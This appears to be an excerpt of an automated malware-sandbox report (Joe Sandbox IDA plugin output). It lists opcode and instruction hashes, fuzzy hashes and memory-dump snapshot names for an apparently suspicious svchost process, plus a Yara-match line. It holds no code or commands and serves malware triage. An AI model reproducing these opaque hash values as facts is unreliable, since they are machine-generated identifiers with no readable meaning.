                                                                                                                                                                              • Instruction ID: 4b6ee7f79b33b766b26c475afca313d67a7594094ab4c64ec9498bc39394cba5
                                                                                                                                                                              • Opcode Fuzzy Hash: 8fc840cfc63b48f092a2d21bd3748913178db7f6e959b5b83ab29ec2ee15c626
                                                                                                                                                                              • Instruction Fuzzy Hash: 2AF05474A1534CAFDB08EF79E555E9EB7B4EF48304F108095E501EF281DAB4D901CB65
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0706c018954fab5474582440cbed4019fa1a5106047d4928d974d78bbb053ba5
                                                                                                                                                                              • Instruction ID: 18f10cf3700a11811dcfc117130a18aa9adc567d66b4c99bb424dc706799b88a
                                                                                                                                                                              • Opcode Fuzzy Hash: 0706c018954fab5474582440cbed4019fa1a5106047d4928d974d78bbb053ba5
                                                                                                                                                                              • Instruction Fuzzy Hash: 28F05474A15348EBDB08EFA5D515EAEB7B4BF48300F444499A541EB2C1EB74D9008B55
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 732388e3a966be6f7c3326964db6979d19035c6604237cead5bd8cf590dc6ee7
                                                                                                                                                                              • Instruction ID: dacf836ad93a9d9e76e5099df608bf5f20a6ee192a62248d1ee987a8b785930a
                                                                                                                                                                              • Opcode Fuzzy Hash: 732388e3a966be6f7c3326964db6979d19035c6604237cead5bd8cf590dc6ee7
                                                                                                                                                                              • Instruction Fuzzy Hash: EDF0B474A14348ABDB08EFB5E501EAEB3B4AF48300F044098A401EF2C0DA74D900CB54
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                              • Instruction ID: d0607da6acd74b4f96875b5af795d5dce067d8c6563a62788fd48cf8d47e1391
                                                                                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                              • Instruction Fuzzy Hash: BBE092727026002BD721DE5ACC84F8777AEAFC6B10F04047AB5045E251CAE29D1982A8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4b01601a79e37ce7f5baa38a5350093756f74453d657efbcec117d932a4c41b1
                                                                                                                                                                              • Instruction ID: cc26e844358e936e3ce9f77ab498a21f16e90a3976e942324df89d673cbe8747
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b01601a79e37ce7f5baa38a5350093756f74453d657efbcec117d932a4c41b1
                                                                                                                                                                              • Instruction Fuzzy Hash: 6FE0C232201654ABC321FB5DDD00F8A739EEFE5360F004121F1508F6D0CA60AD50C794
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                              • Instruction ID: ce2c182f77b530b7b6e2dc9b619333bdf9d32380591e63e8e98fa9fc527b68db
                                                                                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                              • Instruction Fuzzy Hash: 37D0123631717097CB29E6556954FA7AD559BC1AA4F1A006D780AD7900CD158C82D7E0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                              • Instruction ID: c530bb5384036566a0fbb9745759b70f6ac68750a5212e3938a971e8da9f4551
                                                                                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                              • Instruction Fuzzy Hash: 44D09275213A80CFD65ACB09C6A4B16B3A8BB44A44F8508A0E501CBB61D668EA40CA00
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                                              • Instruction ID: d27fdccbe3c581967e9916bc78d8a77ac6236bb6f24a5687e3689a96b69bc48b
                                                                                                                                                                              • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                                                                                                              • Instruction Fuzzy Hash: 26D05E35946AC4CFE727CB08C165B907BF8F705F40F890098E04247BA2C37C9984CB14
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                              • Instruction ID: 1e344e277649e2742a0fc3f0db720c4b73b7aa931c2458dee4bdbffd149abae2
                                                                                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                              • Instruction Fuzzy Hash: 1BC0123A290648AFC712EA98CD01F427BA9EB98B40F004061F2048B670C631E920EA84
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                              • Instruction ID: 7da3143d76b8e57cea0eda7d19a875d6db70669ad9ac53a821a87734cf0ad205
                                                                                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                              • Instruction Fuzzy Hash: ECD01236100248EFCB01DF41C890DDE772AFBD8710F148419FD190B6108A31ED62DA50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                              • Instruction ID: ddbe01832254e42a93da901c489723a8ecf6b41655a20a43893028b1903eaa63
                                                                                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                              • Instruction Fuzzy Hash: C2C04C797026418FCF15DB19D294F4577E4F744740F1518D0E945CB721E624E911CA10
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                                                                                                                              • Instruction ID: 01ba5f7c146adeb67287544d76bdd6a3efb55f0173ed54f7b3041f7c1017800d
                                                                                                                                                                              • Opcode Fuzzy Hash: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                                                                                                                              • Instruction Fuzzy Hash: EB90023160680412A140B25888C4586404697E0301B95C011E0824558C8B148A565361
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7b3f0529ec851a99ecfd003f5960d117bb6afb1f7af1d1997f8089d41794a367
                                                                                                                                                                              • Instruction ID: e0bd43d44e986bd36e8a90078e1262f2de595ab0de44d2c14464fbc3aaa9cc2e
                                                                                                                                                                              • Opcode Fuzzy Hash: 7b3f0529ec851a99ecfd003f5960d117bb6afb1f7af1d1997f8089d41794a367
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F90022120284842E140B3588844B4F414687E1302FD5C019A4556558CCA1589555721
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 67fbe63d28bea02e68ff0c88be21d5f291f7e993902b9c70c5cc8bb9024d3e12
                                                                                                                                                                              • Instruction ID: ebf75311d4cc6e8be332e1bff245d77dc34c9d21d86c180ee46c09a6e422404c
                                                                                                                                                                              • Opcode Fuzzy Hash: 67fbe63d28bea02e68ff0c88be21d5f291f7e993902b9c70c5cc8bb9024d3e12
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F90022124240C02E140B258C4547470047C7D0701F95C011A0424558D87168A6566B1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                                                                                                                              • Instruction ID: 31c4487d3d9f160c0566974e884df66fb97e06aef162cd4979ea005641b483ea
                                                                                                                                                                              • Opcode Fuzzy Hash: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C900261602504425140B2588844446604697E13013D5C115A0954564C871889559269
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 47afe021aebfc917bddc87b01181fd5393b9f69e753dd3badc6a1f1776a78216
                                                                                                                                                                              • Instruction ID: 03b7dc2d073b18c54f35ab2ab09424512d4a4b3285f8a516415e83477771e312
                                                                                                                                                                              • Opcode Fuzzy Hash: 47afe021aebfc917bddc87b01181fd5393b9f69e753dd3badc6a1f1776a78216
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A900221212C0442E200B6688C54B47004687D0303F95C115A0554558CCA1589615521
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: ef01c826e4f2d491ced91db91d96c5f33a0271ec591378117fc246f367cf24cb
                                                                                                                                                                              • Instruction ID: 53e1e59cc55c36c8eb81471fc9d623e8d898e9c8c1f12b73d69f62b399d5d0d6
                                                                                                                                                                              • Opcode Fuzzy Hash: ef01c826e4f2d491ced91db91d96c5f33a0271ec591378117fc246f367cf24cb
                                                                                                                                                                              • Instruction Fuzzy Hash: D590022130240802E102B2588454646004AC7D1345FD5C012E1824559D87258A53A132
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 39a27428b8f1fdbe3449d8ea03080ed833af42c4b7004e16f833bf3261f6114e
                                                                                                                                                                              • Instruction ID: 978006cc818ad45688e9bf3326130e6f60e5a08615a408aec7e73aba200f319b
                                                                                                                                                                              • Opcode Fuzzy Hash: 39a27428b8f1fdbe3449d8ea03080ed833af42c4b7004e16f833bf3261f6114e
                                                                                                                                                                              • Instruction Fuzzy Hash: 2090022160240902E101B2588444656004B87D0341FD5C022A1424559ECB258A92A131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e98725506c98022ba5deacef4cc9964df7cd60aa99bf7288232664f7e78c8b65
                                                                                                                                                                              • Instruction ID: 59181bd4e2d6fd29544c31fa701e200b18705e20aa5500c56e524898d07dc6d6
                                                                                                                                                                              • Opcode Fuzzy Hash: e98725506c98022ba5deacef4cc9964df7cd60aa99bf7288232664f7e78c8b65
                                                                                                                                                                              • Instruction Fuzzy Hash: FA90027120240802E140B2588444786004687D0301F95C011A5464558E87598ED56665
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: ef96ed259ca64e9fc2418f0eacf27e677f9433b92b9ec748356f8cbe9a1dc667
                                                                                                                                                                              • Instruction ID: 3b6bb0c34a6ba2ec1a1f678cdc35a72b6daae2aa2892e3d3dcdf912f82107a26
                                                                                                                                                                              • Opcode Fuzzy Hash: ef96ed259ca64e9fc2418f0eacf27e677f9433b92b9ec748356f8cbe9a1dc667
                                                                                                                                                                              • Instruction Fuzzy Hash: 8690026120280803E140B6588844647004687D0302F95C011A2464559E8B298D516135
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b0b24b08cd9b73036ac379a5c449e85c6081021d73db1d86b1e01f7cdc8b93ac
                                                                                                                                                                              • Instruction ID: 0bc5dc4228b72584672d1f4bbae8f9f53ef7260f8db34b8434486fd1bd405ca5
                                                                                                                                                                              • Opcode Fuzzy Hash: b0b24b08cd9b73036ac379a5c449e85c6081021d73db1d86b1e01f7cdc8b93ac
                                                                                                                                                                              • Instruction Fuzzy Hash: 9290022120644842E100B6589448A46004687D0305F95D011A1464599DC7358951A131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 062179a3dbf3215bde3c83ad06605c2c06b336800e7d10bc57b7e40d42a9d8ed
                                                                                                                                                                              • Instruction ID: ab0f1fbdc6f89c7dc8aca5e5c922a93baeac8626dd8c408127e529d253689b7b
                                                                                                                                                                              • Opcode Fuzzy Hash: 062179a3dbf3215bde3c83ad06605c2c06b336800e7d10bc57b7e40d42a9d8ed
                                                                                                                                                                              • Instruction Fuzzy Hash: B890022921340402E180B258944864A004687D1302FD5D415A041555CCCA1589695321
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e7ee507783092ba30be6069646c793fb114ad41006c3fffcf7a0911945683dbe
                                                                                                                                                                              • Instruction ID: 78b4e79fd1b16aa4bb57255434fa8ce5aefa62395f07a379fa2cd7aea63590db
                                                                                                                                                                              • Opcode Fuzzy Hash: e7ee507783092ba30be6069646c793fb114ad41006c3fffcf7a0911945683dbe
                                                                                                                                                                              • Instruction Fuzzy Hash: 3D90023120340542A540B3589844A8E414687E1302BD5D415A0415558CCA1489615221
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6eced130dffc702fe6f3e77ff98dc75140229b264900807e194e1423ea3c7460
                                                                                                                                                                              • Instruction ID: c6734bda95344e59599846dbd64c33f696c4fd329d6da1672c993ea8dd9f6e79
                                                                                                                                                                              • Opcode Fuzzy Hash: 6eced130dffc702fe6f3e77ff98dc75140229b264900807e194e1423ea3c7460
                                                                                                                                                                              • Instruction Fuzzy Hash: BF90022130240403E140B25894586464046D7E1301F95D011E0814558CDA1589565222
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 52b3526746390bf4d0e5d58bf27eba5de1f4f22a6abbd35f28c875f5b8991d77
                                                                                                                                                                              • Instruction ID: 7d5c2ee8df3fd87a442fced2f2bf09b1ffe7fe3f6b6e38da27442eb94cb4f563
                                                                                                                                                                              • Opcode Fuzzy Hash: 52b3526746390bf4d0e5d58bf27eba5de1f4f22a6abbd35f28c875f5b8991d77
                                                                                                                                                                              • Instruction Fuzzy Hash: 6490023520240802E510B2589844686008787D0301F95D411A082455CD875489A1A121
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 668ef1cf4b401e0d3d8e12bb3cf605d23c2aec6012e464b8fe41d16ef49f2796
                                                                                                                                                                              • Instruction ID: d9e062dcc6b90e0d271e18a4c10fad491bbdf1ecf487d0e8e18833c814d1d5b6
                                                                                                                                                                              • Opcode Fuzzy Hash: 668ef1cf4b401e0d3d8e12bb3cf605d23c2aec6012e464b8fe41d16ef49f2796
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E90023124240802E141B2588444646004A97D0341FD5C012A0824558E87558B56AA61
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c52917ffc51e59714fb4af53e2fa364a478908248d0a18dff09608e6ada1b66e
                                                                                                                                                                              • Instruction ID: b4de34f3f80a891febf8bb8f0285f8965509446860203a28027176e33da0a03d
                                                                                                                                                                              • Opcode Fuzzy Hash: c52917ffc51e59714fb4af53e2fa364a478908248d0a18dff09608e6ada1b66e
                                                                                                                                                                              • Instruction Fuzzy Hash: 86900221243445526545F2588444547404797E03417D5C012A1814954C86269956D621
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4760b6e73a80a4d2383849cfdc01fa10067def3114f633e339cc56359abd7e35
                                                                                                                                                                              • Instruction ID: c975f90432bedbf3e330998a409d7d30fdae0cf2c907d4e67e36df3829efe30c
                                                                                                                                                                              • Opcode Fuzzy Hash: 4760b6e73a80a4d2383849cfdc01fa10067def3114f633e339cc56359abd7e35
                                                                                                                                                                              • Instruction Fuzzy Hash: 6190023120240C42E100B2588444B86004687E0301F95C016A0524658D8715C9517521
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: eb0aaadc08cf1727cb5fdd83109ed87dfd891d00e2d93714d029c7702ee84b82
                                                                                                                                                                              • Instruction ID: 3562224f492677f2b485cb2cf162425621684dd381711d8bebde34beaf226a28
                                                                                                                                                                              • Opcode Fuzzy Hash: eb0aaadc08cf1727cb5fdd83109ed87dfd891d00e2d93714d029c7702ee84b82
                                                                                                                                                                              • Instruction Fuzzy Hash: 2290023120248C02E110B258C44478A004687D0301F99C411A482465CD879589917121
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 61f04b5bef9c70e658d54790893ffe949106e2065d6732cb5994ddc058554ba5
                                                                                                                                                                              • Instruction ID: 91c583f3f708e6fbe1ad4dc74aee16e99e956f0a51ee552c465b15ef6b06fa83
                                                                                                                                                                              • Opcode Fuzzy Hash: 61f04b5bef9c70e658d54790893ffe949106e2065d6732cb5994ddc058554ba5
                                                                                                                                                                              • Instruction Fuzzy Hash: 2F90023120240802E100B6989448686004687E0301F95D011A5424559EC76589916131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
